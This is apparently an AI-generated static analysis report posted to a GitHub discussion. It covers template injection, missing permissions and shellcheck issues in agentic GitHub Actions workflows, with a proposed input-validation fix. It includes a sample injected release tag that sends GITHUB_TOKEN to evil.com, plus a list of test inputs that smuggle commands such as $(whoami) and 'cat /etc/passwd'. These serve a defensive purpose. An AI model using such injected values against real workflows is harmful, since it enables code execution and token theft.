🔍 Static Analysis Report - November 23, 2025

[github-actions[bot]]

🔍 Static Analysis Report - November 23, 2025

Executive Summary

Completed comprehensive static analysis scan of 90 agentic workflows using three security scanning tools (zizmor, poutine, actionlint). Identified 12 findings across 8 workflows, including 3 HIGH severity template injection vulnerabilities requiring immediate attention.

Key Metrics

Metric	Count
Workflows Scanned	90
Tools Used	zizmor, poutine, actionlint
Total Findings	12
Workflows Affected	8
High Severity Issues	3

Severity Distribution

Severity	Count	Status
🔴 Critical	0	-
🔴 High	3	⚠️ Requires immediate action
🟡 Medium	0	-
🟡 Low	1	Review recommended
ℹ️ Informational	1	Low priority
⚠️ Warning	7	Configuration improvements

Full Analysis Report

Findings by Tool

🛡️ Zizmor Security Scanner

Total Findings: 5 template injection instances

Template Injection Vulnerabilities

Workflow	Severity	Location	Description
release-highlights.md	🔴 HIGH	Line 415 (3 instances)	Code injection via template expansion with user input
mcp-inspector.md	🟡 Low	Line 1675	Template expansion in controlled context
changeset.md	ℹ️ Info	Line 6014	Template expansion in git config step

High Severity Details - release-highlights.md:

Location: .github/workflows/release-highlights.lock.yml:415:9
Context: - env:
Issue: Unsanitized github.event.inputs.release_tag used directly in shell commands
Risk: Arbitrary code execution with GITHUB_TOKEN permissions

The release-highlights workflow accepts user input via workflow_dispatch and passes it directly into shell scripts without validation. This creates a critical injection vulnerability where an attacker could execute arbitrary commands.

Attack Example:

# Malicious input:
release_tag: "v1.0.0; curl evil.com/steal?token=$GITHUB_TOKEN"

🔍 Actionlint Linter

Total Findings: 4 issues in release-highlights.md

Injection Warnings

Type	Severity	Location	Description
injection	⚠️ Warning	Line 418	Arbitrary external contributor input via github.event.inputs.release_tag
shellcheck SC2086	ℹ️ Info	Line 418 (3 instances)	Unquoted variables causing potential globbing/word splitting

Injection Warning Details:

Source: github.event.inputs.release_tag
Issue: External input flows into shell script without validation
Impact: Command injection vulnerability

Shellcheck Issues:

• Multiple unquoted variable references in shell script
• Can cause unexpected behavior with special characters
• Should use "${VARIABLE}" instead of $VARIABLE

🔐 Poutine Supply Chain Scanner

Findings: None

No supply chain security issues detected in this scan. All workflows appear to use trusted action sources and proper supply chain security practices.

⚙️ Permission Warnings (gh-aw Compiler)

Total Findings: 5 workflows missing required permissions

Workflow	Missing Permissions	Required By
test-assign-milestone-allowed.md	issues:read, pull-requests:read	issues, pull_requests toolsets
test-claude-assign-milestone.md	issues:read, pull-requests:read	issues, pull_requests toolsets
test-codex-assign-milestone.md	issues:read, pull-requests:read	issues, pull_requests toolsets
test-copilot-assign-milestone.md	issues:read, pull-requests:read	issues, pull_requests toolsets
test-close-discussion.md	issues:read, pull-requests:read	issues, pull_requests toolsets

Impact: These test workflows will fail when attempting to access GitHub API resources without proper permissions declared.

Fix: Add permissions block to workflow frontmatter:

permissions:
  issues: read
  pull-requests: read

Clustered Findings by Issue Type

🎯 Template Injection (Highest Priority)

Affected Workflows: 3
Total Instances: 5
Severity Range: Informational to HIGH

Most Common Pattern: Using ${{ }} template expressions with external input in shell scripts

Recommended Action:

1. Immediate: Fix HIGH severity issues in release-highlights.md
2. Short-term: Review Low/Info severity instances
3. Long-term: Implement template injection prevention in workflow templates

🐚 Shell Script Issues

Affected Workflows: 1 (release-highlights.md)
Total Instances: 3
Issue Type: Unquoted variables (SC2086)

Pattern: Using $VARIABLE instead of "$VARIABLE" in bash scripts

Fix Complexity: Low - Add quotes around variable references

🔒 Missing Permissions

Affected Workflows: 5 (all test workflows)
Impact: Workflow failures when accessing protected resources

Pattern: Test workflows using github toolsets without declaring permissions

Fix Complexity: Low - Add permissions block to frontmatter

Priority Recommendations

🚨 Immediate Action Required (HIGH Severity)

1. Fix template injection in release-highlights.md

Risk Level: HIGH - Code injection with GITHUB_TOKEN permissions

Fix Steps:

1. Move github.event.inputs.release_tag to environment variable
2. Add input validation and sanitization
3. Verify tag exists before processing
4. Quote all shell variables

Estimated Time: 15-30 minutes

See detailed fix template in cache: /tmp/gh-aw/cache-memory/fix-templates/zizmor-template-injection-high.md

🟡 Short-Term Actions (Low/Medium Priority)

2. Review template injection in mcp-inspector.md (Low severity)

• Verify no untrusted data flows into MCP setup
• Document why current usage is safe

3. Add missing permissions to test workflows

• Update 5 test workflow files
• Add issues:read and pull-requests:read permissions

4. Fix shellcheck warnings in release-highlights.md

• Quote all variable references
• Use "${VAR}" instead of $VAR

📊 Long-Term Improvements

5. Implement security scanning in CI/CD

• Add pre-commit hooks for zizmor/actionlint
• Run static analysis on all workflow changes
• Block PRs with HIGH/CRITICAL findings

6. Update workflow templates

• Add input validation patterns
• Document security best practices
• Create secure boilerplate code

7. Security training for workflow authors

• Document common vulnerabilities
• Provide secure coding examples
• Review existing workflows periodically

Fix Template for Top Priority Issue

Template Injection in release-highlights.md (HIGH Severity)

Issue: Unsanitized user input from github.event.inputs.release_tag flows directly into shell commands.

Current Vulnerable Code:

- env:
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
  run: |
    RELEASE_TAG="${{ github.event.inputs.release_tag }}"

Fixed Code:

- name: Setup environment and fetch release data
  env:
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    INPUT_RELEASE_TAG: ${{ github.event.inputs.release_tag }}
  run: |
    set -e

    # Validate and sanitize input
    if [ -n "$INPUT_RELEASE_TAG" ]; then
      # Allow only safe characters: alphanumeric, dots, dashes, underscores
      RELEASE_TAG=$(echo "$INPUT_RELEASE_TAG" | tr -cd 'a-zA-Z0-9._-')

      # Verify sanitization didn't change input (unsafe chars present)
      if [ "$RELEASE_TAG" != "$INPUT_RELEASE_TAG" ]; then
        echo "Error: Invalid release tag format"
        exit 1
      fi

      echo "Processing release from workflow input: $RELEASE_TAG"
    else
      RELEASE_TAG=$(gh release list --limit 1 --json tagName --jq '.[0].tagName')
      echo "Processing latest release: $RELEASE_TAG"
    fi

    # Verify tag exists
    if ! gh release view "$RELEASE_TAG" --json tagName >/dev/null 2>&1; then
      echo "Error: Release tag '$RELEASE_TAG' does not exist"
      exit 1
    fi

    # Use quoted variables throughout
    gh release view "$RELEASE_TAG" --json name,tagName,body > "/tmp/gh-aw/release-data/current_release.json"

Security Benefits:

1. ✅ Moves user input to environment variable (auto-escaped)
2. ✅ Validates input format with character allowlist
3. ✅ Verifies tag exists before processing
4. ✅ Uses quoted variables (fixes shellcheck warnings)
5. ✅ Fails fast on invalid input

Historical Context

Previous static analysis scans have identified similar issues:

November 20, 2025 Scan:

• 72 Low severity "obfuscation" warnings (empty string job outputs)
• 1 Low severity template injection in mcp-inspector.md

November 23, 2025 Scan (This Report):

• New HIGH severity template injection findings in release-highlights.md
• Additional actionlint injection and shellcheck warnings
• 5 permission configuration issues in test workflows

Trend Analysis:

• Template injection issues are recurring across multiple workflows
• Need systematic approach to prevent future occurrences
• Test workflows consistently lack proper permission configuration

Testing Recommendations

After applying fixes, test with:

Normal Inputs

• ✅ v1.0.0
• ✅ v2.3.4-beta.1
• ✅ release-2025-11-23

Malicious Inputs (should be rejected)

• ❌ v1.0.0; curl evil.com
• ❌ v1.0.0$(whoami)
• ❌ v1.0.0 && echo malicious
• ❌ v1.0.0'; cat /etc/passwd

Invalid Inputs

• ❌ Empty string
• ❌ Non-existent tag name
• ❌ Tags with spaces or special chars

Detailed Findings by Workflow

release-highlights.md (6 findings)

Severity: 🔴 HIGH (3) + ⚠️ Warning (3) + ℹ️ Info (3)

Findings:

1. Zizmor template-injection (HIGH) - Line 415 - 3 instances

   • User input in template expansion
   • Direct shell command injection risk

2. Actionlint injection warning - Line 418

   • Arbitrary external contributor input
   • Source: github.event.inputs.release_tag

3. Actionlint shellcheck SC2086 - Line 418 - 3 instances

   • Unquoted variables in shell script
   • Potential word splitting issues

Recommended Action: Apply comprehensive fix addressing all issues simultaneously

mcp-inspector.md (1 finding)

Severity: 🟡 Low

Finding:

• Zizmor template-injection (Low) - Line 1675
• Context: Setup MCPs step
• Uses controlled environment variables and secrets
• Assessment: Low risk, but review recommended

changeset.md (1 finding)

Severity: ℹ️ Informational

Finding:

• Zizmor template-injection (Info) - Line 6014
• Context: Configure Git credentials
• Assessment: Informational only, verify no untrusted data

Test Workflows (5 workflows, same issue)

Workflows Affected:

• test-assign-milestone-allowed.md
• test-claude-assign-milestone.md
• test-codex-assign-milestone.md
• test-copilot-assign-milestone.md
• test-close-discussion.md

Issue: Missing required permissions for GitHub toolsets

Fix: Add to each workflow:

permissions:
  issues: read
  pull-requests: read

Summary Statistics

By Tool

Tool	Findings	Percentage
Zizmor	5	42%
Actionlint	4	33%
Poutine	0	0%
gh-aw compiler	5	42%

By Severity

Severity	Count	Percentage	Priority
High	3	25%	🚨 Immediate
Low	1	8%	🟡 Review
Informational	1	8%	ℹ️ Monitor
Warning	7	58%	⚠️ Address soon

By Workflow Type

Type	Affected Workflows
Production workflows	3 (release-highlights, mcp-inspector, changeset)
Test workflows	5 (test-*-assign-milestone, test-close-discussion)

Next Steps

This Week

• Apply HIGH severity fix to release-highlights.md
• Test release-highlights with various inputs
• Add permissions to test workflows
• Document security review in PR

Next Week

• Review Low/Info severity findings
• Update workflow creation documentation
• Create security checklist for new workflows
• Schedule workflow security training

This Month

• Implement automated security scanning in CI
• Update all workflow templates with security best practices
• Conduct comprehensive security audit of remaining workflows
• Create monitoring dashboard for security findings

Additional Resources

• Fix Templates: /tmp/gh-aw/cache-memory/fix-templates/zizmor-template-injection-high.md
• Full Scan Data: /tmp/gh-aw/cache-memory/security-scans/2025-11-23.json
• Vulnerability Database: /tmp/gh-aw/cache-memory/vulnerabilities/by-tool.json
• Zizmor Documentation: (redacted)#template-injection
• GitHub Security Hardening: https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

Conclusion

This scan identified critical security vulnerabilities requiring immediate attention, particularly template injection issues that could allow arbitrary code execution. The HIGH severity findings in release-highlights.md should be fixed immediately, followed by addressing permission configuration issues in test workflows. Implementing automated security scanning and updating workflow templates will help prevent similar issues in the future.

---

Scan Date: 2025-11-23 09:00 UTC
Tools Used: zizmor v1.x, poutine v1.x, actionlint v1.x
Generated by: Static Analysis Report Agent

AI generated by Static Analysis Report

[pelikhan]

/q remove github.event.inputs.release_tag from release highlights agentic workflow

[pelikhan]

/plan address test workflows issues

[github-actions[bot]]

✅ Agentic Plan Command completed successfully.

[github-actions[bot]]

This discussion was automatically closed because it was created by an agentic workflow more than 1 week ago.